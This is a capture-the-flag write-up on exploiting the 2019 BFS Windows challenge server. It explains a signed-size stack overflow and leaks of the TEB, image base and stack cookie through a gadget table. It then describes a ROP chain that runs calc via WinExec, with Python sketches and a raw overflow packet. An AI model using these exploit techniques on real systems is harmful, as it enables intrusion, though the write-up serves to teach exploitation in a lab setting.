- Introduction
- Initial Dynamic Analysis
- Statically Identifying the Vulnerability
- Strategy
- Preparing the Exploit
- Building a ROP Chain
- See Exploit in Action
- Contact
Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017,
I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable
for which an exploit is expected to work on a Windows 10 Redstone machine.
The challenge's goals were set to:
- Bypass ASLR remotely
- Achieve arbitrary code execution (pop calc or notepad)
- Have the exploited process properly continue its execution
Running the file named 'eko2019.exe' opens a console application that seemingly
waits for and accepts incoming connections from (remote) network clients.
Quickly checking out the running process' security features using Sysinternals
Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good.
Further checking out the running process dynamically using tools such as Sysinternals
TCPView, Process Monitor or simply running netstat could have been an option right now,
but personally I prefer diving directly into the code using my static analysis tool of choice,
IDA Pro (I recommend following along with your favourite disassembler / decompiler).
After disassembling the executable file and looking at the list of identified functions,
it turned out that at most 17 functions out of 188 in total needed to be analyzed for
weaknesses, with the remaining ones being known library functions, imported functions
and the main() function itself.
Navigating to and running the disassembled code's main() function through
the Hex-Rays decompiler and putting some additional effort into renaming functions,
variables and annotating the code resulted in the following output:
By looking at the code and annotations shown in the screenshot above, we can see there is
a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed
by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument
to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably
where the party is going to happen, so let's have a look at it.
As an attacker, what we are going to look for and concentrate on are functions within the server's
executable code that process any kind of input that is controlled client-side. All with the goal in mind
of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the
two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for
receiving data from a remote network client.
The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure.
It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is
"size_payload" and the third is unused.
By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server
ensures basic protocol compatibility between connected clients and the server. Any client packet
that fails in complying with this magic constant as part of the "header" packet is denied further
processing as a consequence.
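The header layout described above can be sketched in Python as follows. This is only an illustration: the NUL byte that pads "Eko2019" to 8 bytes, the 32 bit width of "size_payload" and the 4 unused trailing bytes are assumptions inferred from the offsets and sizes given in the text, and build_header() is a made-up helper name.

```python
import struct

# Assumption: the 7-character magic is padded with a NUL to fill 8 bytes.
MAGIC = b"Eko2019\x00"
HEADER_SIZE = 16


def build_header(size_payload: int) -> bytes:
    """Pack magic (offset 0), a signed 32 bit size_payload (offset 8)
    and 4 unused padding bytes into a 16 byte header."""
    return struct.pack("<8si4x", MAGIC, size_payload)


hdr = build_header(512)
print(len(hdr), hdr.hex())
```

A header built this way with a size of 512 or less is what a well-behaved client would send.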
By comparing the "size_payload" field of the "header" structure to a constant value in line 27,
the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to
recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination
buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad!
If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the
"buf" buffer, including the return address to main() on the stack. Overwriting the saved return address
could have resulted in straightforward and reliable code execution.
Skimming through this function's remaining code (and also through all the other remaining functions)
doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either.
So we must probably have overlooked something and -yes you guessed it- it's in the processing of
the "pkthdr" structure.
A useful pointer to what the problem could be is provided by the hint window that appears
as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a
signed integer comparison, which means the size restriction of 512 can successfully be bypassed
by providing a negative number along with the header packet in "size_payload"!
Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer
type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload"
variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument
to recv(). This enables an attacker to cause the server to accept payload data with a size of up to
65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the
intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack
beyond its intended limits.
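To make the interplay of the signed comparison and the 16 bit truncation more tangible, here is a small Python model of both steps. The function names are invented for this sketch and the code only mimics the arithmetic described above, not the server's actual implementation.

```python
def server_accepts(size_payload: int) -> bool:
    """Model of the signed check: every value <= 512 passes, negatives included."""
    return size_payload <= 512


def recv_length(size_payload: int) -> int:
    """Model of LOWORD(): keep the low 16 bits, zero-extended."""
    return size_payload & 0xFFFF


def crafted_size(wanted_len: int) -> int:
    """Return a negative 32 bit value whose low word equals wanted_len."""
    if not 0 <= wanted_len <= 0xFFFF:
        raise ValueError("wanted_len must fit into 16 bits")
    raw = 0xFFFF0000 | wanted_len      # upper 16 bits set, so the sign bit is set
    return raw - (1 << 32)             # reinterpret as a signed 32 bit integer


size = crafted_size(0x210)
print(size, server_accepts(size), hex(recv_length(size)))
```

Any negative value works for the check; setting all upper bits is just one convenient way to choose the low word freely.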
If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely
because we preferred sharpening or refreshing our assembly comprehension skills instead, we could
just as well have a look at the assembler code:
- the "jle" instruction indicates a signed integer comparison
- the "movzx eax, word ptr..." instruction moves 16 bits of data
from a data source to a 32 bit register eax, zero extending its
upper 16 bits.
Alright, before we can start exploiting this vulnerability and take control of the server process'
instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the
handle_client() function's prologue in the disassembly, we can see there is a stack cookie that
will be checked by the function's epilogue, which eventually needs to be taken care of.
In order to bypass ASLR, we need to cause the server to leak an address that belongs to
its process space. Fortunately, there is a call to the send() function in line 45, which sends
8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine.
These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the
exec_gadget() function in line 44.
Going further up the code to line 43, we can see self-modifying code that uses the
WriteProcessMemory() API function to patch the exec_gadget() function with whatever data
"gadget_buf" contains.
The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41
which is passed the address of a global variable "g_gadget_array" as an argument.
Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument,
swaps its endianness and then returns the result to the caller.
In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be
executed by the call to exec_gadget() and its result is then sent back to the connected client.
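The gadget selection summarized above can be modelled in a few lines of Python. This is a sketch under assumptions: the table contents below are invented for illustration (the real array is generated by main() at run time), and select_gadget() is a hypothetical name, not a function of the server.

```python
def bswap64(value: int) -> int:
    """Reverse the byte order of a 64 bit integer, like copy_gadget() does."""
    return int.from_bytes(value.to_bytes(8, "big"), "little")


def select_gadget(gadget_array, gadget_idx: int) -> bytes:
    """Return the 8 code bytes that would be patched into exec_gadget()."""
    entry = gadget_array[gadget_idx % 256]
    return bswap64(entry).to_bytes(8, "little")


# Illustrative table only, not the server's real data.
demo_array = [0] * 256
demo_array[62] = 0x488B01C3C3C3C3C3  # hypothetical entry: mov rax, [rcx]; ret; ...
print(select_gadget(demo_array, 62 + 256).hex())
```

Because of the modulo operation, an index of 62 + 256 selects the same entry as 62.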
Looking at the cross references to "g_gadget_array" which is only initialized during run-time,
we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of
the server's main() function:
Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized
with 62, which means that a gadget pointed to by "g_gadget_array[62]" is executed by default.
The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent
to the "buf[512]" variable and thus can be written to by sending the server data that exceeds
the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us
to have the server execute a gadget other than the default one at index 62 (0x3e).
In order to be able to find a reasonable gadget in the first place, I wrote a little Python script
that mimics the server's initialization of "g_gadget_array" and then disassembles all its
256 elements using the Capstone Engine Python bindings:
I spent quite some time reading the resulting list of gadgets trying to find a suitable
gadget to be used for leaking a qualified pointer from the running process, but with
partial success only. Knowing I must have been missing something, I still settled for
a gadget that would manage to leak only the lower 32 bits of a 64 bit pointer, for the
sake of making progress and fixing it later:
Using this gadget would modify the pointer that is passed to the call to exec_gadget(),
making it point to a location other than what the "p" pointer usually points to, which
could then be used to leak further data.
By working around some limitations with hard-coded values, I still managed to
develop quite a stable exploit including full process continuation. But it was only after a
kind soul asked me whether I hadn't thought of reading from the TEB that I got on the
right track to writing an exploit that is more than just quite stable. Thank you :-)
The TEB holds vital information that can be used for bypassing ASLR, and it is accessed
via the gs segment register on 64 bit Windows systems. Looking through the list of
gadgets for any occurrence of "gs:" yields a single hit at index 0x65 of the
"g_gadget_array" array.
Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to
have the gadget that is shown in the screenshot above to do so, the rcx register must first be
set to 0x30.
The rcx register is the first argument to the exec_gadget() function, which is loaded
from the "p" variable on the stack. Like the "gadget_idx" variable, "p" is adjacent to the
overflowable buffer, hence overwritable as well. Great.
By sending a particularly crafted sequence of network packets, we are now given the ability
to leak arbitrary data of the server thread's TEB structure. For example, by sending the following
packet to the server, gadget number 0x65 will be called with rcx set to 0x30.
[0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00']
Sending this packet will overwrite the target thread's following variables on the stack and will
cause the server to send us the current thread's TEB address:
[buf] + [gadget_idx] + [p]
The following screenshot shows the Python implementation of the leak_teb() function used by
the exploit.
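For readers without access to the screenshot, a rough Python sketch of such a function could look like this. It is not the original implementation: the host address, the helper names build_request() and recv_exact(), the header field widths, and the assumption that the server replies with exactly the 8 byte result on a fresh connection are all mine.

```python
import socket
import struct

HOST, PORT = "127.0.0.1", 54321   # HOST is an assumption; the port is taken from the analysis
BUF_SIZE = 0x200                  # size of "buf" on the server's stack


def build_request(gadget_idx: int, rcx: int) -> bytes:
    """Build header + payload that overwrite gadget_idx and p behind buf."""
    payload = b"A" * BUF_SIZE + struct.pack("<QQ", gadget_idx, rcx)
    # Negative size whose low 16 bits equal the real payload length.
    size_field = (0xFFFF0000 | len(payload)) - (1 << 32)
    header = struct.pack("<8si4x", b"Eko2019\x00", size_field)
    return header + payload


def recv_exact(sock: socket.socket, count: int) -> bytes:
    """Read exactly count bytes or raise if the peer closes early."""
    data = b""
    while len(data) < count:
        chunk = sock.recv(count - len(data))
        if not chunk:
            raise ConnectionError("connection closed before reply was complete")
        data += chunk
    return data


def leak_teb(host: str = HOST, port: int = PORT) -> int:
    """Run gadget 0x65 with rcx = 0x30 and return the leaked TEB address."""
    with socket.create_connection((host, port)) as sock:
        sock.sendall(build_request(0x65, 0x30))
        return struct.unpack("<Q", recv_exact(sock, 8))[0]
```

Calling leak_teb() against a running instance of the server would then return the TEB address as an integer.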
With the process' TEB address leaked to us, we are well prepared for leaking further information
by using the default gadget 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed
to by rcx per request:
In turn, leaking arbitrary memory allows us to
- bypass DEP and ASLR
- identify the stack cookie's position on the stack
- leak the stack cookie
- locate ourselves on the stack
- eventually run an external process
In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired
from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative
addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses
Data Execution Prevention.
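With the TEB address already known, the image base can be resolved with two reads, as the following Python sketch shows. The read_qword callable is a placeholder for whatever remote read primitive the exploit provides (for example one built on gadget 62); it is not part of the original exploit code. The offsets are those of the 64 bit TEB and PEB layouts.

```python
TEB_PEB_OFFSET = 0x60         # TEB.ProcessEnvironmentBlock on 64 bit Windows
PEB_IMAGE_BASE_OFFSET = 0x10  # PEB.ImageBaseAddress on 64 bit Windows


def leak_image_base(read_qword, teb: int) -> int:
    """Follow TEB -> PEB -> ImageBaseAddress using a 64 bit read primitive.

    read_qword is a hypothetical callable: address -> 64 bit value.
    """
    peb = read_qword(teb + TEB_PEB_OFFSET)
    return read_qword(peb + PEB_IMAGE_BASE_OFFSET)


# Stand-in for remote memory, only to demonstrate the pointer chasing.
fake_memory = {0x1000 + 0x60: 0x2000, 0x2000 + 0x10: 0x7FF6AAAA0000}
print(hex(leak_image_base(fake_memory.__getitem__, 0x1000)))
```

Passing the primitive in as a parameter keeps the pointer-chasing logic testable without a live target.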
Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API
function, as well as the stack cookie's xor key can be leaked.
What's still missing is a way of acquiring the stack cookie from the current thread's stack frame.
Although I knew that the approach was faulty, I had
initially leaked the cookie by abusing the fact that
there exists a reliable pointer to the formatted text that
is created by any preceding call to the printf() function.
By sending the server a packet that solely consisted of
printable characters with a size that would overflow the
entire stack frame but stopping right before the stack
cookie's position, the call to printf() would leak the
stack cookie from the stack into the buffer holding the
formatted text whose address had previously been acquired.
While this might have been an interesting approach, it is
error-prone: if the cookie contained any null bytes in the
middle, the call to printf() would copy only part of the
cookie, which would make the exploit unreliable.
Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB
and walk the entire stack, starting from StackLimit, looking for the first occurrence of the saved return
address to main().
Relative from there, the cookie that belongs to the handle_client() function's stack frame
can be addressed and subsequently leaked to our client. Having a copy of the cookie
and a copy of the xor key at hand will allow the rsp register to be recovered, which can
then be used to build the final ROP chain.
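The stack walk and the recovery of rsp can be sketched in Python as shown below. Again, read_qword stands for a hypothetical remote read primitive, and the function names are invented for this example. The sketch also assumes that the cookie stored in the frame is the global cookie xor-ed with rsp, which is what the text above implies.

```python
TEB_STACK_BASE_OFFSET = 0x08   # NT_TIB.StackBase on 64 bit Windows
TEB_STACK_LIMIT_OFFSET = 0x10  # NT_TIB.StackLimit on 64 bit Windows


def find_return_slot(read_qword, teb: int, ret_addr: int):
    """Scan from StackLimit towards StackBase for the first slot holding ret_addr.

    Returns the address of that stack slot, or None if nothing matches.
    """
    stack_base = read_qword(teb + TEB_STACK_BASE_OFFSET)
    stack_limit = read_qword(teb + TEB_STACK_LIMIT_OFFSET)
    for addr in range(stack_limit, stack_base, 8):
        if read_qword(addr) == ret_addr:
            return addr
    return None


def recover_rsp(stack_cookie: int, xor_key: int) -> int:
    """Undo the xor that was applied when the frame's cookie was stored."""
    return stack_cookie ^ xor_key
```

Since every qword costs one network round trip, a real exploit may prefer to start scanning closer to where the frame is expected rather than at StackLimit.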
Now that we know how to leak all information from the vulnerable process that is required for
building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc.
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:
1.) The ROP chain starts at "entry_point", which is located at offset 0x230 of the
    vulnerable function's "buf" variable and which previously contained the original
    return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp
    register, which effectively lets rsp point to the next gadget at 2.).
    Stack pivoting is a vital step in order to avoid trashing the caller's stack frame.
    Messing up the caller's frame would put stable process continuation at risk.
2.) This gadget loads the address of a "pop rax" gadget into r12 in preparation for
    a "workaround" that is required in order to compensate for the return address
    that is pushed onto the stack by the call r12 instruction in 4.).
3.) A pointer to "buf" is loaded into rax, which now points to the "calc\0" string.
4.) The pointer to "calc\0" is copied to rcx, which is the first argument for the
    subsequent API call to WinExec() in 5.). The call to r12 pushes a return address
    onto the stack and causes a "pop rax" gadget to be executed, which pops the address
    off the stack again.
5.) This gadget causes the WinExec() API function to be called.
6.) The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence
    the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the
    call to WinExec().
7.) The original return address to main()+0x14a is loaded into rax.
8.) rbx is loaded with the address of "entry_point".
9.) The original return address to main()+0x14a is restored by patching "entry_point"
    on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted,
    followed by a few dummy bytes.
10.) rsp is adjusted so it will slowly slide into its old position at offset 0x230 of
     "buf", in order to return to main() and guarantee process continuation.
11.) see 10.)
12.) see 10.)
13.) see 10.)
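As a rough illustration of how the pieces are laid out inside the overflowing buffer, the following Python sketch places values at the offsets named in the walkthrough above (0x0 for "calc\0", 0x228 for "ptr_to_chain", 0x230 for "entry_point"). All addresses and the gadget offset are placeholders. A real payload additionally has to carry "gadget_idx", "p", the leaked stack cookie at its proper offset and the remaining gadgets of the chain, none of which are modelled here.

```python
import struct


def q(value: int) -> bytes:
    """Pack a 64 bit little-endian value."""
    return struct.pack("<Q", value)


def build_overflow(fields: dict, total_len: int, filler: int = 0x41) -> bytes:
    """Return total_len filler bytes with each fields[offset] blob written at its offset."""
    buf = bytearray([filler]) * total_len
    for offset, blob in fields.items():
        if offset < 0 or offset + len(blob) > total_len:
            raise ValueError(f"field at {offset:#x} does not fit")
        buf[offset:offset + len(blob)] = blob
    return bytes(buf)


image_base = 0x7FF600000000              # placeholder, leaked at run time in practice
payload = build_overflow(
    {
        0x000: b"calc\x00",              # command string at the start of buf
        0x228: q(0x1122334455667788),    # ptr_to_chain, placeholder value
        0x230: q(image_base + 0x1234),   # entry_point gadget, hypothetical offset
    },
    total_len=0x238,
)
print(len(payload))
```

Keeping the offsets in one dictionary makes it easy to see at a glance which parts of the frame are being overwritten.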